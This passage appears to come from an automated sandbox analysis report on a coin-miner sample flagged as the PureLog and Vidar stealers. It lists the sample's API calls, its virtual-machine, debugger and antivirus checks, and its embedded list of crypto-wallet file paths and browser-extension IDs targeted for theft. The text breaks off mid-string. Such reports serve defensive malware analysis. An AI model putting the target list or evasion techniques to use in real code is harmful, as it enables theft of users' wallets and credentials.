                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040B030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004011E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D320
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,DeleteFileA,FindNextFileA,FindClose,1_2_004164A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00417550
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040A530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00416CF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00417140
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040A980
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,1_2_004168E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410540 GetSystemInfo,wsprintfA,1_2_00410540
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_1-91144
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_1-90063
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041A68F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0041A68F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004185A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00411020 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,1_2_00411020
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041A68F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0041A68F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041F768 SetUnhandledExceptionFilter,1_2_0041F768
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041BBB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041BBB7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAEB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6CAEB66C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAEB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6CAEB1F7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC9AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6CC9AC62
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Searches for specific processes (likely to inject)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00411BD0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00411BD0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCE4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,1_2_6CCE4760
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00401000 cpuid 1_2_00401000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00410370
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,LocalFree,1_2_004103E9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004102A0 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,1_2_004102A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410220 GetProcessHeap,HeapAlloc,GetUserNameA,1_2_00410220
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410300 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_00410300
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iles%\Windows Defender\MsMpeng.exe
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.45d3258.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.43f3218.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5960000.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.45d3258.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5960000.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4853278.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4493238.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.43f3218.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4493238.13.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4853278.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1758894906.0000000005960000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1752049015.00000000043CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1752049015.0000000004853000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.439ab30.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.439ab30.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe PID: 6308, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4076, type: MEMORYSTR
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum\wallets\\*.*
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum\wallets\\*.*
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: info.seco
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MetaMask|1|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|MetaMask|1|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|1|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|TronLink|1|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|BinanceChainWallet|1|fhbohimaelbohpjbbldcngcnapndodjp|1|1|0|Yoroi|1|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase|1|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|1|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|1|iWallet|1|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|RoninWallet|1|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|1|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CloverWallet|1|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|LiqualityWallet|1|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra_Station|1|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|1|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|AuroWallet|1|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|PolymeshWallet|1|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|1|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98|1|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|1|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain|1|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|1|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|1|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Oxygen 